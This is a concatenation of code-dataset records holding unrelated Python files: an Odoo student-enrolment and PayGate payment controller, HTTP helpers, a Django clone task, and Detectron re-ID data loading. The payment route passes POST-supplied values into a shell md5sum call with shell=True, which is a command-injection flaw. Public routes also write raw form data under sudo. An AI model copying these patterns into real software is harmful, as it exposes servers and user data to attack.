self.global_vals = request.session['global_vals']\n if request.httprequest.method == 'POST':\n return request.redirect('/enrolment/registration_details')\n enrolment_id = request.session['enrolment_id']\n enrolment = request.env['enrolment.enrolment'].browse([enrolment_id])\n total = 0.0\n if enrolment:\n for subject in enrolment.subject_ids:\n total += subject.lst_price\n return request.render('swgc_enrolment.enrolment_payment_success',\n {'enrolment': enrolment, 'global_vals': self.global_vals, 'total': total})\n\n @http.route(['/enrolment/payment_unsuccess'], type='http', auth=\"public\", website=True)\n def payment_unsuccess(self, **post):\n cr = request.cr\n if request.httprequest.method == 'POST':\n return request.redirect('/enrolment/payment')\n self.global_vals = request.session['global_vals']\n enrolment_id = request.session['enrolment_id']\n enrolment = request.env['enrolment.enrolment'].browse(cr, SUPERUSER_ID, enrolment_id)\n total = 0.0\n if enrolment:\n for subject in enrolment.subject_ids:\n total += subject.lst_price\n return request.render('swgc_enrolment.enrolment_payment_unsuccess',\n {'enrolment': enrolment, 'global_vals': self.global_vals, 'total': total})\n\n @http.route(['/enrolment/registration_details'], type='http', auth=\"public\", website=True, csrf=False)\n def registration_details(self, **post):\n self.global_vals = request.session['global_vals']\n enrolment = False\n global_vals = self.global_vals\n if post:\n orm_partner = request.env['res.partner']\n enrolment_pool = request.env['enrolment.enrolment']\n global_vals = self.global_vals\n partner_id = request.env['res.partner'].sudo().browse([global_vals['student_id']])\n enrolment_id = request.env['enrolment.enrolment'].sudo().browse([request.session.get('enrolment_id')])\n post['state_id'] = post.get('state_id_new')\n partner_id.write(post)\n enrolment_id.write(post)\n return request.redirect('/enrolment/upload_docs')\n country = request.env['res.country']\n state = request.env['res.country.state']\n ethnic = request.env['student.ethnic']\n disability = request.env['student.disability']\n title = request.env['res.partner.title']\n\n country_ids = country.search([])\n country_list = country.browse(country_ids.ids)\n\n state_ids = state.search([])\n state_read = state_ids.read(['name', 'country_id'])\n state_list = state.browse(state_ids.ids)\n\n ethnic_ids = ethnic.search([])\n ethnic_list = ethnic.browse(ethnic_ids.ids)\n\n disability_ids = disability.search([])\n disability_list = disability.browse(disability_ids.ids)\n\n title_ids = title.search([])\n title_list = title.browse(title_ids.ids)\n\n return request.render('swgc_enrolment.enrolment_registration_details',\n {'enrolment': enrolment, 'country_list': country_list, 'state_list': state_list,\n 'ethnic_list': ethnic_list, 'disability_list': disability_list,\n 'title_list': title_list, 'global_vals': self.global_vals})\n\n @http.route(['/enrolment/upload_docs'], type='http', auth=\"public\", website=True)\n def upload_docs(self, **post):\n self.global_vals = request.session['global_vals']\n enrolment = False\n enrolment_id = request.session.get('enrolment_id')\n if enrolment_id: enrolment = request.env['enrolment.enrolment'].browse([enrolment_id])\n return request.render('swgc_enrolment.enrolment_upload_docs', {'enrolment': enrolment})\n\n @http.route(['/enrolment/submit_docs'], type='http', auth=\"public\", website=True)\n def submit_docs(self, **post):\n self.global_vals = request.session['global_vals']\n if request.httprequest.method == 'POST':\n if request.session.get('enrolment_id'):\n vals = {}\n enrolment_id = request.session.get('enrolment_id')\n document_type = request.env['document.type']\n doc_vals = []\n for filetype, content in post.items():\n fp = post.get(filetype)\n if fp:\n datas = fp.read()\n documenttype = document_type.search([('name', '=ilike', filetype)])\n doc_vals.append((0, 0, {'name': fp.filename, 'type': 'binary', 'datas': base64.b64encode(datas),\n 'datas_fname': fp.filename, 'documenttype': [(6, 0, documenttype.ids)]}))\n vals['document_ids'] = doc_vals\n enrolment = request.env['enrolment.enrolment'].browse([enrolment_id])\n enrolment.write(vals)\n global_vals = self.global_vals\n student_id = global_vals.get('student_id')\n else:\n return request.redirect('/enrolment/')\n return request.redirect('/enrolment/upload_docs')\n\n @http.route(['/enrolment/confirmation'], type='http', auth=\"public\", website=True)\n def confirmation(self, **post):\n self.global_vals = request.session['global_vals']\n enrolment_id = request.session.get('enrolment_id')\n if request.httprequest.method == 'POST':\n if enrolment_id:\n enrolment = request.env['enrolment.enrolment'].browse([enrolment_id])\n enrolment.write({'complete_enrolment': True})\n enrolment.send_sms()\n return request.redirect('/enrolment/enrolment_success')\n if enrolment_id:\n enrolment = request.env['enrolment.enrolment'].browse([enrolment_id])\n total = 0.0\n for subject in enrolment.subject_ids:\n total += subject.lst_price\n return request.render('swgc_enrolment.enrolment_confirmation',\n {'enrolment': enrolment, 'total': total, 'global_vals': self.global_vals})\n\n @http.route(['/enrolment/enrolment_success'], type='http', auth=\"public\", website=True)\n def success(self, **post):\n enrolment_id = request.session['enrolment_id']\n cr = request.cr\n orm_template = request.env['mail.template']\n template_id = orm_template.search([('name', '=ilike', 'Enrolment Confirmation')], limit=1)\n if template_id:\n template_id.send_mail(enrolment_id)\n try:\n self.global_vals = {}\n del (request.session['sale_order_id'])\n del (request.session['enrolment_id'])\n except Exception as e:\n logging.debug(request.session)\n logging.error('----------------Got Exception in session clear---------------------%s' % e)\n return request.render('swgc_enrolment.enrolment_success')\n\n @http.route(['/enrolment/report'], type='http', auth=\"public\", website=True)\n def report(self, **post):\n return request.render('swgc_enrolment.report_enrolment_pdf')\n\n @http.route(['/country/select'], type='http', auth=\"public\", website=True, csrf=False)\n def country_select(self, **post):\n stateObj = request.env['res.country.state'].sudo()\n country_id = int(post.get('country_id'))\n state_ids = stateObj.search([('country_id', '=', country_id)])\n state_lis = []\n for state in state_ids:\n state_lis.append('''''' % (state.id, state.name))\n if len(state_lis):\n return json.dumps({'flag': 1, 'state_lis': state_lis})\n else:\n return json.dumps({'flag': 2, 'state_lis': state_lis})\n\n # PayGate methods\n\n @http.route('/enrolment/redirect_paygate', type='http', auth='none', methods=['POST'], csrf=False, website=True)\n def redirect_paygate(self, **post):\n acquirer_id = request.env['payment.acquirer'].sudo().search([('provider', '=', 'paygate')], limit=1)\n url = acquirer_id.paygate_url + '/initiate.trans'\n country = pycountry.countries.get(alpha_2=(post.get('country')).upper())\n currency = post.get('currency').encode('ascii', 'ignore')\n ref = post.get('ref').encode('ascii', 'ignore')\n amount = int(float(post.get('amount').encode('ascii', 'ignore')) * 100)\n email = post.get('email').encode('ascii', 'ignore')\n values = {\n 'PAYGATE_ID': acquirer_id.paygate_id.encode('ascii', 'ignore'),\n 'REFERENCE': ref,\n 'AMOUNT': amount,\n 'CURRENCY': currency,\n 'RETURN_URL': '%senrolment/payment_success_paygate' % (http.request.httprequest.host_url),\n 'TRANSACTION_DATE': str(datetime.now().date()),\n 'LOCALE': 'en',\n 'COUNTRY': country.alpha_3.encode('ascii', 'ignore'),\n 'EMAIL': email,\n }\n checksum = \"%s%s%s%s%s%s%s%s%s%s\" % (\n acquirer_id.paygate_id, ref.decode(\"utf-8\"), str(amount), currency.decode(\"utf-8\"),\n '%senrolment/payment_success_paygate' % (http.request.httprequest.host_url),\n str(datetime.now().date()), 'en',\n country.alpha_3.encode('ascii', 'ignore').decode(\"utf-8\"), email.decode(\"utf-8\"), acquirer_id.paygate_key)\n checksum = subprocess.check_output(\"echo -n %s | md5sum\" % checksum, shell=True)\n checksum = (checksum.decode(\"utf-8\")).split(\"-\")[0].strip()\n values.update({\n 'CHECKSUM': checksum\n })\n sale_order = request.env['sale.order'].sudo().search(\n [('name', '=', post.get('ref').encode('ascii', 'ignore'))])\n init_tras = requests.post(url=url, data=values)\n response = dict(x.split('=') for x in init_tras.text.split('&'))\n request.session['paygate_response'] = response\n if response.get('PAY_REQUEST_ID'):\n render_value = {\n 'pay_request_id': response.get('PAY_REQUEST_ID'),\n 'checksum': response.get('CHECKSUM'),\n 'ref': ref,\n 'amount': amount,\n 'url': acquirer_id.paygate_url + '/process.trans'\n }\n return request.render('swgc_enrolment.confirm_payment_page_new', render_value)\n else:\n return werkzeug.utils.redirect('/enrolment/payment')\n\n def paygate_autopay(self, order):\n sale_order = request.env['sale.order'].sudo()\n account_invoice = request.env['account.invoice'].sudo()\n order_id = sale_order.search([('name', '=', order)])\n if order_id:\n order_id.action_confirm()\n inv_id = order_id.action_invoice_create()\n if inv_id:\n self.invoice_paid(inv_id[0], order_id.id)\n else:\n invoice_id = account_invoice.search([('number', '=', order)])\n if invoice_id:\n self.invoice_paid(invoice_id.id, order_id.id)\n return True\n\n def invoice_paid(self, inv_id, order):\n account_invoice = request.env['account.invoice'].sudo()\n account_voucher = request.env['account.payment'].sudo()\n if inv_id:\n inv = account_invoice.browse([inv_id])\n order = request.env['sale.order'].sudo().browse([order])\n inv.compute_taxes()\n if inv:\n order._get_invoiced()\n inv.action_invoice_open()\n payment = request.env['account.payment'].sudo().create({\n 'payment_type': 'inbound',\n 'payment_transaction_id': order.transaction_ids[0].id,\n 'partner_id': inv.partner_id.id,\n 'partner_type': 'customer',\n 'amount': float(inv.amount_total),\n 'journal_id': order.transaction_ids[0].acquirer_id.journal_id.id,\n 'payment_method_id': order.transaction_ids[0].acquirer_id.journal_id.inbound_payment_method_ids.id\n })\n payment.post()\n data = json.loads(inv.outstanding_credits_debits_widget)\n for each in data.get('content'):\n inv.assign_outstanding_credit(each.get('id'))\n order.sudo().action_confirm()\n for line in order.order_line:\n line.write({\n 'qty_invoiced': line.product_uom_qty\n })\n return True\n","sub_path":"swgc_enrolment/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":33195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"636620522","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport requests\n\nfrom dps_utils.misc import retry\n\n\ndef assert_ok(r, raw=False):\n if not isinstance(r, requests.models.Response):\n raise TypeError('Expected , <%s> provided.' % type(r))\n\n if not r.ok:\n raise requests.HTTPError('HTTP error. URL: %s. Status code: %d. Body:\\n%s' % (\n r.url, r.status_code, r.text), response=r)\n\n return r.content if raw else r.text\n\n\ndef json_decode(r):\n try:\n response = r.json()\n except ValueError:\n assert_ok(r)\n raise ValueError('JSON decode error. URL: %s. Body:\\n%s' % (r.url, r.text))\n\n if isinstance(response, dict) and response.get('error_code', response.get('is_err')):\n raise requests.HTTPError('API got an error. Message: %s' % response.get(\n 'message', response.get('msg', 'Unknown Error')), response=r)\n\n assert_ok(r)\n return response\n\n\n@retry(2, 'Request failed.', False)\ndef request(url, method='POST', timeout=(2, 8), **kwargs):\n decode_json = kwargs.pop('decode_json', True)\n r = requests.request(method, url, timeout=timeout, **kwargs)\n if decode_json:\n return json_decode(r)\n return assert_ok(r)\n\n\n@retry(3, 'Download failed.', False)\ndef download(url, timeout=(3, 10)):\n r = requests.get(url, timeout=timeout)\n return assert_ok(r, True)\n","sub_path":"dps_utils/curl.py","file_name":"curl.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"84142540","text":"import logging\r\n\r\nfrom django.contrib.auth import get_user_model\r\nfrom django.core.mail import EmailMessage\r\nfrom django.db import transaction\r\nfrom django.template.loader import get_template\r\nfrom dramatiq import actor\r\n\r\nfrom api.collate.utils.merge_clone import create_validation, copy_results, MODE\r\nfrom api.models import JobStatus, Validation, CloneJob\r\nfrom reporting.site_settings import production\r\n\r\nlog = logging.getLogger(__name__)\r\n\r\n\r\n@actor\r\n@transaction.atomic\r\ndef do_clone(job_id: int, validation_id: int):\r\n try:\r\n job = CloneJob.objects.get(pk=job_id)\r\n log.debug('Started clone task with id: %d, username: %s', job_id, job.requester.username)\r\n\r\n # Create new validation\r\n validation = create_validation(job, [validation_id], MODE.CLONE)\r\n\r\n # Flat copy results from validation list\r\n copy_results(validation, [validation_id], None)\r\n\r\n job.status = JobStatus.DONE\r\n\r\n except:\r\n log.exception('Clone job failed.')\r\n job.status = JobStatus.FAILED\r\n\r\n finally:\r\n job.save()\r\n\r\n _send_clone_notification(job, validation, validation_id)\r\n\r\n\r\ndef _send_clone_notification(job: CloneJob, validation: Validation, validation_id: int):\r\n cloned_validation = Validation.objects.get(pk=validation_id)\r\n\r\n context = dict(\r\n site_url=job.site_url,\r\n validation_id=validation.id,\r\n validation_name=validation.name,\r\n cloned_val_id=cloned_validation.id,\r\n cloned_val_name=cloned_validation.name,\r\n )\r\n\r\n recipients = []\r\n if job.requester.email:\r\n recipients.append(job.requester.email)\r\n\r\n if job.status == JobStatus.DONE:\r\n template_name = 'collate/clone_success.html'\r\n subject = f\"Reporter: Validation '{validation.name}' is cloned successfully\"\r\n clone_status = 'cloned SUCCESSFULLY'\r\n else:\r\n template_name = 'collate/clone_failure.html'\r\n subject = f\"Reporter: Clone of '{validation.name}' failed\"\r\n recipients += get_user_model().staff_emails()\r\n clone_status = 'FAILED to clone'\r\n\r\n template = get_template(template_name)\r\n text = template.render(context)\r\n\r\n log.debug('Validation with id %d is %s, sending notification message.', validation_id, clone_status)\r\n log.debug('Subject of notification message: %s', subject)\r\n log.debug('Recipients: %s', recipients)\r\n\r\n if production:\r\n message = EmailMessage(subject, text, None, recipients)\r\n message.content_subtype = 'html'\r\n message.send()\r\n","sub_path":"backend/reporting/api/collate/tasks/task_clone.py","file_name":"task_clone.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"121871854","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\nimport numpy as np\nimport numpy.random as npr\nimport random\nimport os\nimport cv2\nimport math\n\nfrom detectron.core.config import cfg\nimport detectron.modeling.FPN as fpn\nimport detectron.roi_data.keypoint_rcnn as keypoint_rcnn_roi_data\nimport detectron.roi_data.mask_rcnn as mask_rcnn_roi_data\nimport detectron.utils.blob as blob_utils\nimport detectron.utils.boxes as box_utils\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_reid_blob_names(is_training=True):\n\n blob_names = []\n if is_training:\n # labels_int32 blob: R categorical labels in [0, ..., K] for K\n # foreground classes plus background\n blob_names += ['labels_int32']\n blob_names += ['labels_oh']\n if cfg.REID.PSE_ON:\n blob_names += ['attr_labels_int32']\n blob_names += ['weight']\n blob_names += ['attr_weight']\n return blob_names\n \"\"\"Fast R-CNN blob names.\"\"\"\n # rois blob: holds R regions of interest, each is a 5-tuple\n # (batch_idx, x1, y1, x2, y2) specifying an image batch index and a\n # rectangle (x1, y1, x2, y2)\n blob_names = ['rois']\n if is_training:\n # bbox_targets blob: R bounding-box regression targets with 4\n # targets per class\n blob_names += ['bbox_targets']\n # bbox_inside_weights blob: At most 4 targets per roi are active\n # this binary vector sepcifies the subset of active targets\n blob_names += ['bbox_inside_weights']\n blob_names += ['bbox_outside_weights']\n if is_training and cfg.MODEL.MASK_ON:\n # 'mask_rois': RoIs sampled for training the mask prediction branch.\n # Shape is (#masks, 5) in format (batch_idx, x1, y1, x2, y2).\n blob_names += ['mask_rois']\n # 'roi_has_mask': binary labels for the RoIs specified in 'rois'\n # indicating if each RoI has a mask or not. Note that in some cases\n # a *bg* RoI will have an all -1 (ignore) mask associated with it in\n # the case that no fg RoIs can be sampled. Shape is (batchsize).\n blob_names += ['roi_has_mask_int32']\n # 'masks_int32' holds binary masks for the RoIs specified in\n # 'mask_rois'. Shape is (#fg, M * M) where M is the ground truth\n # mask size.\n blob_names += ['masks_int32']\n if is_training and cfg.MODEL.KEYPOINTS_ON:\n # 'keypoint_rois': RoIs sampled for training the keypoint prediction\n # branch. Shape is (#instances, 5) in format (batch_idx, x1, y1, x2,\n # y2).\n blob_names += ['keypoint_rois']\n # 'keypoint_locations_int32': index of keypoint in\n # KRCNN.HEATMAP_SIZE**2 sized array. Shape is (#instances). Used in\n # SoftmaxWithLoss.\n blob_names += ['keypoint_locations_int32']\n # 'keypoint_weights': weight assigned to each target in\n # 'keypoint_locations_int32'. Shape is (#instances). Used in\n # SoftmaxWithLoss.\n blob_names += ['keypoint_weights']\n # 'keypoint_loss_normalizer': optional normalization factor to use if\n # cfg.KRCNN.NORMALIZE_BY_VISIBLE_KEYPOINTS is False.\n blob_names += ['keypoint_loss_normalizer']\n if cfg.FPN.FPN_ON and cfg.FPN.MULTILEVEL_ROIS:\n # Support for FPN multi-level rois without bbox reg isn't\n # implemented (... and may never be implemented)\n k_max = cfg.FPN.ROI_MAX_LEVEL\n k_min = cfg.FPN.ROI_MIN_LEVEL\n # Same format as rois blob, but one per FPN level\n for lvl in range(k_min, k_max + 1):\n blob_names += ['rois_fpn' + str(lvl)]\n blob_names += ['rois_idx_restore_int32']\n if is_training:\n if cfg.MODEL.MASK_ON:\n for lvl in range(k_min, k_max + 1):\n blob_names += ['mask_rois_fpn' + str(lvl)]\n blob_names += ['mask_rois_idx_restore_int32']\n if cfg.MODEL.KEYPOINTS_ON:\n for lvl in range(k_min, k_max + 1):\n blob_names += ['keypoint_rois_fpn' + str(lvl)]\n blob_names += ['keypoint_rois_idx_restore_int32']\n return blob_names\n\n\ndef add_reid_blobs(blobs, im_scales, roidb):\n \"\"\"Add blobs needed for training Fast R-CNN style models.\"\"\"\n # Sample training RoIs from each image and append them to the blob lists\n for im_i, entry in enumerate(roidb):\n frcn_blobs = _sample_rois(entry, im_scales[im_i], im_i)\n for k, v in frcn_blobs.items():\n blobs[k].append(v)\n # Concat the training blob lists into tensors\n for k, v in blobs.items():\n if isinstance(v, list) and len(v) > 0:\n blobs[k] = np.concatenate(v)\n\n return True\n\n # Add FPN multilevel training RoIs, if configured\n if cfg.FPN.FPN_ON and cfg.FPN.MULTILEVEL_ROIS:\n _add_multilevel_rois(blobs)\n\n # Perform any final work and validity checks after the collating blobs for\n # all minibatch images\n valid = True\n if cfg.MODEL.KEYPOINTS_ON:\n valid = keypoint_rcnn_roi_data.finalize_keypoint_minibatch(\n blobs, valid)\n\n return valid\n\n\ndef _sample_rois(roidb, im_scale, batch_idx):\n \"\"\"Generate a random sample of RoIs comprising foreground and background\n examples.\n \"\"\"\n if cfg.REID.PSE_ON:\n img_labels = np.array([0], dtype=np.float32)\n attr_img_labels = np.array([0], dtype=np.float32)\n weight = np.array([0.0], dtype=np.float32)\n attr_weight = np.array([0.0], dtype=np.float32)\n\n gt_inds = np.where(roidb['gt_classes'] > 0)[0]\n assert len(gt_inds) <= 2, 'Only one ground truth for image is allowed.'\n gt_classes = roidb['gt_classes'][gt_inds].copy()\n\n gt_inds = np.where(roidb['gt_attributions'] > 0)[0]\n assert len(gt_inds) <= 2, 'Only one ground truth for image is allowed.'\n gt_attributions = roidb['gt_attributions'][gt_inds].copy()\n\n classes_or_attributions = roidb['classes_or_attributions']\n for i in range(len(gt_classes)):\n if classes_or_attributions[i] == 0:\n img_labels[0] = gt_classes[i] - 1\n weight[0] = 1.0\n elif classes_or_attributions[i] == 1:\n attr_img_labels[0] = gt_attributions[i] - 1\n attr_weight[0] = cfg.REID.PSE_WEIGHT\n else:\n img_labels[0] = gt_classes[i] - 1\n weight[0] = 1.0\n attr_img_labels[0] = gt_attributions[i] - 1\n attr_weight[0] = cfg.REID.PSE_WEIGHT\n blob_dict = dict(\n labels_int32=img_labels.astype(np.int32, copy=False),\n attr_labels_int32=attr_img_labels.astype(np.int32, copy=False),\n weight=weight.astype(np.float32, copy=False),\n attr_weight=attr_weight.astype(np.float32, copy=False),\n )\n return blob_dict\n\n # Get image label\n img_labels_oh = np.zeros((1, cfg.MODEL.NUM_CLASSES - 1), dtype=np.float32)\n img_labels = np.zeros((1), dtype=np.float32)\n\n gt_inds = np.where(roidb['gt_classes'] > 0)[0]\n assert len(gt_inds) == 1, 'Only one ground truth for image is allowed.'\n gt_classes = roidb['gt_classes'][gt_inds].copy()\n\n img_labels_oh[0][gt_classes[0] - 1] = 1\n img_labels[0] = gt_classes[0] - 1\n\n blob_dict = dict(\n labels_int32=img_labels.astype(np.int32, copy=False),\n labels_oh=img_labels_oh.astype(np.float32, copy=False),\n )\n return blob_dict\n\n rois_per_image = int(cfg.TRAIN.BATCH_SIZE_PER_IM)\n fg_rois_per_image = int(np.round(cfg.TRAIN.FG_FRACTION * rois_per_image))\n max_overlaps = roidb['max_overlaps']\n\n # Select foreground RoIs as those with >= FG_THRESH overlap\n fg_inds = np.where(max_overlaps >= cfg.TRAIN.FG_THRESH)[0]\n # Guard against the case when an image has fewer than fg_rois_per_image\n # foreground RoIs\n fg_rois_per_this_image = np.minimum(fg_rois_per_image, fg_inds.size)\n # Sample foreground regions without replacement\n if fg_inds.size > 0:\n fg_inds = npr.choice(\n fg_inds, size=fg_rois_per_this_image, replace=False)\n\n # Select background RoIs as those within [BG_THRESH_LO, BG_THRESH_HI)\n bg_inds = np.where((max_overlaps < cfg.TRAIN.BG_THRESH_HI) &\n (max_overlaps >= cfg.TRAIN.BG_THRESH_LO))[0]\n # Compute number of background RoIs to take from this image (guarding\n # against there being fewer than desired)\n bg_rois_per_this_image = rois_per_image - fg_rois_per_this_image\n bg_rois_per_this_image = np.minimum(bg_rois_per_this_image, bg_inds.size)\n # Sample foreground regions without replacement\n if bg_inds.size > 0:\n bg_inds = npr.choice(\n bg_inds, size=bg_rois_per_this_image, replace=False)\n\n # The indices that we're selecting (both fg and bg)\n keep_inds = np.append(fg_inds, bg_inds)\n # Label is the class each RoI has max overlap with\n sampled_labels = roidb['max_classes'][keep_inds]\n sampled_labels[fg_rois_per_this_image:] = 0 # Label bg RoIs with class 0\n sampled_boxes = roidb['boxes'][keep_inds]\n\n bbox_targets, bbox_inside_weights = _expand_bbox_targets(\n roidb['bbox_targets'][keep_inds, :])\n bbox_outside_weights = np.array(\n bbox_inside_weights > 0, dtype=bbox_inside_weights.dtype)\n\n # Scale rois and format as (batch_idx, x1, y1, x2, y2)\n sampled_rois = sampled_boxes * im_scale\n repeated_batch_idx = batch_idx * blob_utils.ones(\n (sampled_rois.shape[0], 1))\n sampled_rois = np.hstack((repeated_batch_idx, sampled_rois))\n\n # Base Fast R-CNN blobs\n blob_dict = dict(\n labels_int32=sampled_labels.astype(np.int32, copy=False),\n rois=sampled_rois,\n bbox_targets=bbox_targets,\n bbox_inside_weights=bbox_inside_weights,\n bbox_outside_weights=bbox_outside_weights)\n\n # Optionally add Mask R-CNN blobs\n if cfg.MODEL.MASK_ON:\n mask_rcnn_roi_data.add_mask_rcnn_blobs(blob_dict, sampled_boxes, roidb,\n im_scale, batch_idx)\n\n # Optionally add Keypoint R-CNN blobs\n if cfg.MODEL.KEYPOINTS_ON:\n keypoint_rcnn_roi_data.add_keypoint_rcnn_blobs(\n blob_dict, roidb, fg_rois_per_image, fg_inds, im_scale, batch_idx)\n\n return blob_dict\n\n\ndef random_crop(im):\n # Randomly crop a sub-image.\n crop_prob = cfg.REID.CROP_PROB\n crop_ratio = cfg.REID.CROP_RATIO\n assert crop_prob <= 1\n assert crop_prob >= 0\n if crop_prob == 0 or np.random.uniform() > crop_prob:\n return im, [0, 0, im.shape[0] - 1, im.shape[1] - 1]\n assert crop_ratio > 0\n assert crop_ratio < 1\n h_ratio = np.random.uniform(crop_ratio, 1)\n w_ratio = np.random.uniform(crop_ratio, 1)\n crop_h = int(im.shape[0] * h_ratio)\n crop_w = int(im.shape[1] * w_ratio)\n h_start = np.random.randint(0, im.shape[0] - crop_h)\n w_start = np.random.randint(0, im.shape[1] - crop_w)\n im = np.copy(im[h_start:h_start + crop_h, w_start:w_start + crop_w, :])\n\n im_crop = [h_start, w_start, h_start + crop_h - 1, w_start + crop_w - 1]\n return im, im_crop\n\n\ndef horizontal_crop(im):\n horizontal_crop_prob = cfg.REID.HORIZONTAL_CROP_PROB\n horizontal_crop_ratio = cfg.REID.HORIZONTAL_CROP_RATIO\n # Horizontal Crop\n if ((horizontal_crop_ratio < 1) and (horizontal_crop_prob > 0)\n and (np.random.uniform() < horizontal_crop_prob)\n and im.shape[0] * 1.0 / im.shape[1] > 1.5):\n h_ratio = np.random.uniform(horizontal_crop_ratio, 1)\n crop_h = int(im.shape[0] * h_ratio)\n im = im[0:crop_h]\n\n return im, [0, 0, crop_h - 1, im.shape[1] - 1]\n else:\n return im, [0, 0, im.shape[0] - 1, im.shape[1] - 1]\n\n\n# Do not use it\n# padding image to 3:1 before resizing\ndef fix_rate(img):\n if not cfg.REID.FIX_RATE:\n return img\n\n h = img.shape[0]\n w = img.shape[1]\n #print \"h:%d,w:%d\" % (h, w)\n if float(h) / float(w) <= 3:\n out_img = np.random.uniform(0, 1, size=(3 * w, w, 3))\n out_img[0:3 * w, 0:w, 0] = self.im_mean[0] * 255\n out_img[0:3 * w, 0:w, 1] = self.im_mean[1] * 255\n out_img[0:3 * w, 0:w, 2] = self.im_mean[2] * 255\n else:\n out_img = np.random.uniform(0, 1, size=(h, int(h / 3), 3))\n out_img[0:h, 0:int(h / 3), 0] = self.im_mean[0] * 255\n out_img[0:h, 0:int(h / 3), 1] = self.im_mean[1] * 255\n out_img[0:h, 0:int(h / 3), 2] = self.im_mean[2] * 255\n h_o = out_img.shape[0]\n w_o = out_img.shape[1]\n delta_h = (h_o - h) / 2\n delta_w = (w_o - w) / 2\n #print \"delta_h: %d,delta_w: %d\" % (delta_h,delta_w)\n #print \"h_o:%d w_o: %d\" % (h_o,w_o)\n out_img[delta_h:h + delta_h, delta_w:w + delta_w, :] = img\n return out_img\n\n\ndef hsv_jitter(im):\n hsv_jitter_prob = cfg.REID.HSV_JITTER_PROB\n assert hsv_jitter_prob <= 1\n assert hsv_jitter_prob >= 0\n\n if hsv_jitter_prob == 0 or np.random.uniform() > hsv_jitter_prob:\n return im\n\n saturation_range = cfg.REID.SATURATION_RANGE\n hue_range = cfg.REID.HUE_RANGE\n value_range = cfg.REID.VALUE_RANGE\n\n im_hsv = cv2.cvtColor(im, cv2.COLOR_RGB2HSV).astype(np.int)\n #saturation\n if saturation_range > 0:\n offset = np.random.randint(-saturation_range, saturation_range)\n #print offset\n im_hsv[:, :, 1] = im_hsv[:, :, 1] + offset\n\n #hue\n if hue_range > 0:\n offset = np.random.randint(-hue_range, hue_range)\n #print offset\n im_hsv[:, :, 0] = im_hsv[:, :, 0] + offset\n\n #value\n if value_range > 0:\n offset = np.random.randint(-value_range, value_range)\n #print offset\n im_hsv[:, :, 2] = im_hsv[:, :, 2] + offset\n\n im_hsv = np.clip(im_hsv, 0, 255).astype(np.uint8)\n im_rgb = cv2.cvtColor(im_hsv, cv2.COLOR_HSV2RGB)\n return im_rgb\n\n\ndef gaussian_blur(im):\n gaussian_blur_prob = cfg.REID.GAUSSIAN_BLUR_PROB\n gaussian_blur_kernel = cfg.REID.GAUSSIAN_BLUR_KERNEL\n if gaussian_blur_prob == 0 or np.random.uniform() > gaussian_blur_prob:\n return im\n\n sizes = range(1, gaussian_blur_kernel, 2)\n kernel_size = random.sample(sizes, 1)[0]\n im = cv2.GaussianBlur(im, (kernel_size, kernel_size), 0)\n return im\n\n\ndef random_erasing(img):\n random_erasing_prob = cfg.REID.RANDOM_ERASING_PROB\n sl = cfg.REID.SL\n sh = cfg.REID.SH\n r1 = cfg.REID.R1\n if random_erasing_prob == 0 or np.random.uniform(0,\n 1) > random_erasing_prob:\n return img\n\n for attempt in range(100):\n area = img.shape[0] * img.shape[1]\n target_area = np.random.uniform(sl, sh) * area\n aspect_ratio = np.random.uniform(r1, 1.0 / r1)\n\n h = int(round(math.sqrt(target_area * aspect_ratio)))\n w = int(round(math.sqrt(target_area / aspect_ratio)))\n\n #rate = 1\n if w < img.shape[1] and h < img.shape[0]:\n x1 = random.randint(0, img.shape[0] - h)\n y1 = random.randint(0, img.shape[1] - w)\n if img.shape[2] == 3:\n img[x1:x1 + h, y1:y1 + w, 0] = cfg.PIXEL_MEANS[0, 0, 0]\n img[x1:x1 + h, y1:y1 + w, 1] = cfg.PIXEL_MEANS[0, 0, 1]\n img[x1:x1 + h, y1:y1 + w, 2] = cfg.PIXEL_MEANS[0, 0, 2]\n else:\n img[x1:x1 + h, y1:y1 + w, 0] = cfg.PIXEL_MEANS[0, 0, 0]\n return img\n return img\n\n\ndef save_image(img, name):\n output_dir = cfg.OUTPUT_DIR\n\n cv2.imwrite(os.path.join(output_dir, name + '.png'), img)\n\n\ndef _expand_bbox_targets(bbox_target_data):\n \"\"\"Bounding-box regression targets are stored in a compact form in the\n roidb.\n\n This function expands those targets into the 4-of-4*K representation used\n by the network (i.e. only one class has non-zero targets). The loss weights\n are similarly expanded.\n\n Returns:\n bbox_target_data (ndarray): N x 4K blob of regression targets\n bbox_inside_weights (ndarray): N x 4K blob of loss weights\n \"\"\"\n num_bbox_reg_classes = cfg.MODEL.NUM_CLASSES\n if cfg.MODEL.CLS_AGNOSTIC_BBOX_REG:\n num_bbox_reg_classes = 2 # bg and fg\n\n clss = bbox_target_data[:, 0]\n bbox_targets = blob_utils.zeros((clss.size, 4 * num_bbox_reg_classes))\n bbox_inside_weights = blob_utils.zeros(bbox_targets.shape)\n inds = np.where(clss > 0)[0]\n for ind in inds:\n cls = int(clss[ind])\n start = 4 * cls\n end = start + 4\n bbox_targets[ind, start:end] = bbox_target_data[ind, 1:]\n bbox_inside_weights[ind, start:end] = (1.0, 1.0, 1.0, 1.0)\n return bbox_targets, bbox_inside_weights\n\n\ndef _add_multilevel_rois(blobs):\n \"\"\"By default training RoIs are added for a single feature map level only.\n When using FPN, the RoIs must be distributed over different FPN levels\n according the level assignment heuristic (see: modeling.FPN.\n map_rois_to_fpn_levels).\n \"\"\"\n lvl_min = cfg.FPN.ROI_MIN_LEVEL\n lvl_max = cfg.FPN.ROI_MAX_LEVEL\n\n def _distribute_rois_over_fpn_levels(rois_blob_name):\n \"\"\"Distribute rois over the different FPN levels.\"\"\"\n # Get target level for each roi\n # Recall blob rois are in (batch_idx, x1, y1, x2, y2) format, hence take\n # the box coordinates from columns 1:5\n target_lvls = fpn.map_rois_to_fpn_levels(blobs[rois_blob_name][:, 1:5],\n lvl_min, lvl_max)\n # Add per FPN level roi blobs named like: _fpn\n fpn.add_multilevel_roi_blobs(blobs, 